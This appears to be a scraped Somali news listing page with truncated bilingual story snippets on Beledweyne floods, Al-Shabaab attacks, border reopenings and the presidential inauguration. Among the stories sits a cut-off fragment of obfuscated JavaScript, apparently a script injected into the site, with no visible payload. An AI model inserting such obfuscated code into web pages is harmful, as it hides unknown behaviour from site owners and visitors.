QM oo shaacisay in 22 qof ay ku dhinteen fatahaadda Beledeweyne
MUQDISHO (SMN - Daadad xooggan oo ku dhuftay magaaladda Beledweyne ayaa waxaa ku dhintay 22 qof, waxaana ay saameeyeen in ka badan 450,000 qof, sida ay sheegtay hay'adda Qaramada Midoobay u qaabilsan bini'aadantinimada ee OCHA Axaddii shalay.
Fatahaadda ayaa timid ka dib markii webiga Shabeelle uu qararka jabsaday, taasoo ku qasabtay tobanaan kun inay ka barakacaan guriyahooda xaafadaha Beledweyne.
Roobab mahiigaan...
Kenya to reopen 3 Somalia border posts shut over Al-Shabaab attacks
NAIROBI - Plans are underway to reopen three border points between Kenya and Somalia, after 12 years of closure due to the threat of terrorism. The first meeting is today in Nairobi.
Mandera/Belet Hawo (Belethawa), Liboi-Harhar/Dhobley and Kiunga/Ras Kamboni were closed by President Uhuru Kenyatta’s administration.
The previous administration’s term ended before talks on the reopening were concluded.
They were closed in...
MW Xasan Sheekh oo sagootiyay ciidamo ku biiraya dagaalka Shabaab
MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud ayaa ka saagootiyey Xerada Jeneraal Goordan ee magaalada Muqdisho cutubyo ka tirsan Ciidamada Xooga Dalka gaar ahaan Guutada Gantaal ee Ilaalo Qaran oo ka qeyb-galaya dagaalka dalka lagaga xoreynayo argagixisada Alshabaab.
Madaxweynaha Jamhuuriyadda oo ciidamada u jeediyay khudbad isugu jirtay dardaaran, dhiirri-galin iyo guubaabo ayaa u sheegay rajada dowladda...
Somalia floods leave at least 22 people dead, says UN
Beledweyne – Flash flooding in central Somalia has killed 22 people and affected over 450,000, the UN's humanitarian agency OCHA said Sunday, after the Shabelle River burst its banks, forcing tens of thousands out of their homes.
Heavy rainfall earlier in the week sent water gushing into homes in Beledweyne town in Hiran region, submerging roads and buildings as residents...
Mid kamid ah dadkii ka badbaaday weerarkii xarunta gobolka Bamaadir oo wareysi bixiyay
MUQDISHO (SMN) - Waxaa weli isa soo tarayo macluumaadka laga helayo weerarkii xooganaa ee ay shalay kooxda Al-Shabaab ku qaaday xarunta maamulka gobolka Banaadir, kaas oo sababay khasaare isugu jiro dhimasho iyo dhaawac.
Weerarka waxaa fuliyay xubno ka tirsan kooxda Al-Shabaab oo isku soo ekeysiiyay ciidamada dowladda, kuwaas beegsaday dhismaha xarunta aqalka dowladda hoose ee Xamar.
Ugu yaraan 5 qof ayaa...
Shacab kasoo barakacay dhibaatada Al-Shabaab oo soo gaaray Muqdisho
Qoysas Soomaaliyeed oo kasoo barackay deegaannada ay ka arrimayaan Al-Shabaab ayaa maanta soo gaaray magaalada Muqdisho, kuwaas oo ay haystaan xaalado bani’aadanimo iyo kuwa ammaan darri oo ay uga soo tageen deegaankooda.
Dadkan oo ka kala yimid meelo kala duwan ayaa tegay xarumaha hay’daha amniga, si ay dhibtooda ugu sheegtaan, maadaama ay soo maciin bideen Dowladda Federaalka Soomaaliya oo haatan...
Kooxo hubeysan oo weerar ka fuliyay Muqdisho + Bartilmaameedka
MUQDISHO (SMN) - Faah-faahinno kala duwan ayaa kasoo baxaya isku-day la doonayay in lagu khaarijiyo Hamdi Sharif Ali oo ka tirsan shaqaalaha wasaaradda maaliyadda Soomaaliya oo maanta ka dhacay magaalada Muqdisho.
Labada nin ayaa mar qura rasaas huwiyay Mooto Bajaj (Tuk-Tuk) oo ay la socotay, inkastoo ay badbaaday Hamdi Sharif Ali oo ahayd bartilmaameedka weerarka.
Dad goobjoogayaal ah ayaa innoo sheegay...
Foreign delegation land in Mogadishu for president’s inauguration
MOGADISHU - High-level delegations from the region and across the world that will attend the Presidential Inauguration of Hassan Sh. Mohamud, on Tuesday, arrived in the Somali capital Mogadishu.
Some of these delegations came prior to their heads of State, therefore, those who landed at Aden Abdulle International Airport include, Djibouti, Ethiopia, Kenya, and Bahrain according to the Protocol Department...
A man executed in Southwest State for killing a woman
BAIDOA - Southwest State has carried out a swift execution of a man accused of killing a businesswoman in Baidoa city.
Hassan Mohamed was executed by firing squad after Bay regional court found him guilty and sentenced him to death for killing a woman and hiding her body in a toilet Sewer.
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return...
Sawirro: Wafuud caalami ah oo oo soo gaartay magaalada Muqdisho
MUQDISHO (SMN) - Waxaa saacadihii lasoo dhaafay soo gaaray magaalada Muqdisho wufuud caalami ah, kuwaas oo doonaya inay ka qeyb galaan xafladda caleema saarka madaxweynaha Soomaaliya mudane, Xasan Sheekh Maxamuud.
Wafdiga maanta yimid Muqdisho oo isugu jira xubo horudhac u ah madaxda sare e dalalkooda iyo wakiillo dowladeed.
Xubnahan ayaa waxaa ka mid ah Wasiirka difaaca ee dalka Uganda Vicent Bamulangaki...











